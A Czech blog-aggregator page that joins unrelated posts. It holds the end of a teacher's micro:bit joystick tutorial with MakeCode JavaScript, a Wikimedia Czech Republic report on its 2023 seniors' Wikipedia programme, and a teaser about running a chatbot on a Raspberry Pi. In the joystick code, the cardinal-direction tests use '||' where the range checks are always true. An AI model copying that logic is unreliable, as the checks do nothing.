Abych však jen neodkazoval na cizí návody, tak přidám něco ze své zahrádky. Děti zajímalo, jak ukazovat i úhlopříčky. To jsem z hlavy nedal, ale vypracoval jsem si v klidu za domácí úkol. V emulátoru se to ladí trochu těžkopádně, musíte si nastavovat hodnoty na analogových pinech P1 a P2. Povšimněte si inicializace joysticku, chvíli mi trvalo, než jsem přišel na, že když to zapomenu, tak joystick fungovat nebude.

Zároveň jsem se zasekl na tom, že zásadní refactoring se v blocích dělá celkem pracně. Naštěstí jsem si uvědomil, že se můžu přepnout do javascriptu, upravit si tam, a pak se opět vrátit do blokového jazyka..

joystickbit.initJoystickBit()
basic.forever(function () {
    if (joystickbit.getRockerValue(joystickbit.rockerType.Y) >= 800 && joystickbit.getRockerValue(joystickbit.rockerType.X) >= 800) {
        basic.showArrow(ArrowNames.NorthWest)
    } else if (joystickbit.getRockerValue(joystickbit.rockerType.Y) >= 800 && joystickbit.getRockerValue(joystickbit.rockerType.X) <= 200) {
        basic.showArrow(ArrowNames.NorthEast)
    } else if (joystickbit.getRockerValue(joystickbit.rockerType.Y) <= 200 && joystickbit.getRockerValue(joystickbit.rockerType.X) <= 200) {
        basic.showArrow(ArrowNames.SouthEast)
    } else if (joystickbit.getRockerValue(joystickbit.rockerType.Y) <= 200 && joystickbit.getRockerValue(joystickbit.rockerType.X) >= 800) {
        basic.showArrow(ArrowNames.SouthWest)
    } else if (joystickbit.getRockerValue(joystickbit.rockerType.X) <= 200 && (joystickbit.getRockerValue(joystickbit.rockerType.Y) > 200 || joystickbit.getRockerValue(joystickbit.rockerType.Y) < 800)) {
        basic.showArrow(ArrowNames.East)
    } else if (joystickbit.getRockerValue(joystickbit.rockerType.Y) <= 200 && (joystickbit.getRockerValue(joystickbit.rockerType.X) > 200 || joystickbit.getRockerValue(joystickbit.rockerType.X) < 800)) {
        basic.showArrow(ArrowNames.South)
    } else if (joystickbit.getRockerValue(joystickbit.rockerType.X) >= 800 && (joystickbit.getRockerValue(joystickbit.rockerType.Y) > 200 || joystickbit.getRockerValue(joystickbit.rockerType.Y) < 800)) {
        basic.showArrow(ArrowNames.West)
    } else if (joystickbit.getRockerValue(joystickbit.rockerType.Y) >= 800 && (joystickbit.getRockerValue(joystickbit.rockerType.X) > 200 || joystickbit.getRockerValue(joystickbit.rockerType.X) < 800)) {
        basic.showArrow(ArrowNames.North)
    } else {
        basic.showIcon(IconNames.SmallDiamond)
    }
})

Kdyby vám docházely nápady, tak na joysticku můžete po stisku tlačítka ukazovat vzdálenost, kterou naměřil ultrazvukový senzor Cutebotu.

Závěr

Výrobky Elecfreaks jsou zajímavé (pravděpodobně o nich nepíšu naposledy). Cutebot i joystick ve výuce jistě využijete. Pokud byste museli vybírat jediný směr kvůli omezené časové dotaci nebo nedostatku finančních prostředku, tak zvažte, zda jste hračičkové (chcete věci spojovat a řešit případné problémy) nebo zda preferujete kompaktní a robustní řešení. Zároveň dodávám, že informatika i kroužek se zvládnou obejít bez podobných pomůcek. Určitě se nemusíte cítit provinile, pakliže je nemáte. I když pozornost dětí to přitáhne. Respektive to s pomůckami nemusíte přehánět.

Související

• Hudba s Microbitem
• Microbit lavinový vyhledávač
• Obchod HWKITCHEN - Cutebot
• Obchod HWKITCHEN - Joystick

Senioři na Wikipedii patří! To již řadu let potvrzuje úspěšný program Senioři píší Wikipedii. V duchu zmíněného hesla probíhal i rok 2023. Na Wikipedii jsme přivítali nové aktivní seniory, představili několik novinek a zaznamenali nejeden úspěch.

Kurzy jako výkladní skříň

Jako každý rok, i v roce 2023 se seniorské aktivity točily primárně okolo vlajkové lodi celého programu Senioři píší Wikipedii (SePW), tedy kurzů pro seniory. Léty prověřený šestitýdenní scénář kurzů pro seniory-začátečníky tak zavál Wikipedii do Prahy, Ostravy, Plzně, Českých Budějovic, Olomouce a skrze kurzy vedené online i do dalších koutů republiky. Jako každý rok se absolventi začátečnických kurzů ve svých dovednostech mohli dále zdokonalovat. A to díky nabídce navazujících kurzů pro pokročilé editory a pro ty, kteří se chtějí hlouběji ponořit do problematiky Wikimedia Commons.

V roce 2023 jsme otevřeli 14 kurzů SePW, kterými prošlo 83 účastníků. Z těchto kurzů bylo deset pro začátečníky, čtyři pro pokročilé. Tyto kurzy vedlo celkem 10 lektorů z lektorského týmu Wikimedia ČR, kterým patří velký dík za skvělou práci.

Účastnící kurzu Senioři píší Wikipedii v Českých Budějovicích s lektorkou Janou Sekyrovou, , Autor: Odrostlejsi, CC-BY-SA 4.0, via: Wikimedia Commons.

Je libo večerní školy Wikipedie?

Senior wikipedista může projít kurzem začátečnickým, dále dvěma různými kurzy navazujícími. Ale co dál? Právě pro ty nejaktivnější z nejaktivnějších jsme koncem roku 2022 spustili Večerní Wikiškolu pro seniory! Ta nabízí možnost věnovat se rozvoji konkrétních dovedností, které aktivní wikipedisté potřebují ke své práci. Účastníci se tak mohou zaměřit na postupy a vychytávky, které je možné využít v editační praxi a které se na kurzech SePW podrobně neprobírají. Důležité je však zmínit, že online Večerní Wikiškola je populární nejen mezi seniory.

Minulý rok měli wikipedisté šanci navštívit devět takových Wikiškol. Paleta témat byla pestrá a vybrat si mohl opravdu každý. Mezi témata wikiškol jsme zařadili například infoboxy, nahrávání obrázků na Wikimedia Commons, Wikicesty nebo základní informace o Wikidatech. Na své si ale přišli i editoři a fotografové. Všechna témata a více informací naleznete zde.

Svátek wikipedistů seniorů – Seniorské WikiMěsto!

Pravou odměnou pro aktivní wikipedisty seniory je již tradičně zářijové Seniorské WikiMěsto. Se skupinkou seniorů jsme v roce 2023 zavítali do Lysé nad Labem, kde si účastníci mohli užit návštěvy památek, výlety i práci na Wikipedii. Wikipedisté si domů odvezli cennou dokumentaci míst, osobností i historických souvislostí z města a okolí. Podrobně zdokumentovali zámek Lysá, historický archiv, zámeček Bon Repos nebo elektrárnu na Labi.

Na základě detektivní práce jsme tak publikovali i vzácné fotografie interiéru Beniesovy vily, které dokumentují ojedinělé hnutí českého architektonického kubismu a rozšířili tak článek o této památce. Celkem bylo pod volnou licencí zveřejněno na 583 fotografií, které v průběhu Seniorského WikiMěsta v Lysé nad Labem vznikly. Založeno pak bylo tucet článků, rozšířeno či opraveno dalších 32.

Jedna z účastnic, paní Eva Mžourková, byla na Seniorském Wikiměstě v Lysé lad Labem poprvé a odjížděla nadšená.

„Děkuji za to, že se mi otevřel prostor Wikipedie, o kterém jsem neměla tušení. Pozoruji, že existuje komunita wikipedistů, kde vládnou specifická pravidla – sympatická. Doufám, že se mi podaří pokročit v práci na Wikipedii, zatím je to zábava.“

Důležité je však si uvědomit, že to nejsou pouze seniorské akce, kde můžete naše seniory wikipedisty potkat. Na každém editatonu, každém srazu i v samotném spolku Wikimedia Česká republika jsou právě wikisenioři jednou z těch nejaktivnějších a nejvděčnějších skupin uživatelů a přispěvatelů Wikipedie.

Účastníci Seniorského WikiMěsta při prohlídce zámku Bon Repos, Autor: Marie Dirillo, CC-BY-SA 4.0, via: Wikimedia Commons.

Wikisenioři byli slyšet i vidět

Program Senioři píší Wikipedii není jen o práci a obohacování Wikipedie. U seniorského programu jde hlavně o lidi, o jejich příběhy a cenné zkušenosti, které mohou nejen prací na Wikipedii aktivní senioři předávat dále. Právě s tímto poselstvím jsme minulý rok odstartovali Měsíc seniorů na Wikipedii. Celý prosinec jsme tak vzdávali holt právě těm nejaktivnějším wikiseniorům.

Jako každý rok jsme se rovněž ukázali se stánky a možností vyzkoušet si editaci na vlastní kůži na pražském Fresh Senior Festivalu a dnu otevřených dveří Centra Elpida, kde se návštěvníci mohli dozvědět více o našich aktivitách pro seniory, ale také si popovídat s jejich absolventy. Naši aktivní wikisenioři si zde mohli popovídat nejen s návštěvníky festivalu, ale i s redaktorkou Českého rozhlasu!

Závěrem

Rok 2023 jsme zasvětili těm nejaktivnějším Wikiseniorům, pro které jsme představili zbrusu nový formát vzdělávání – Seniorskou Wikiškolu. Díky té se senioři mohou na Wikipedii zdokonalovat každým měsícem a stát se tak ještě výraznější editorskou skupinou. Té jsme pak zasvětili i celý měsíc prosinec. S velkým počtem kurzů, Seniorským WikiMěstem i se všemi dalšími akcemi, můžeme s klidným srdcem a naplněni radostí prohlásit, že v roce 2023 se u nás senioři rozhodně nenudili!

ChatGPT známe všichni…Mě ale napadlo rozjet si ho lokálně a to rovnou na Raspberry Pi 4. A tak jsem k tomu natočil video na YouTube a sepsal podpůrný článek. Proč by to někdo dělal, ptáte se? No tak jednak je to …

Příspěvek Vlastní AI na Raspberry Pi pochází z Spajk.cz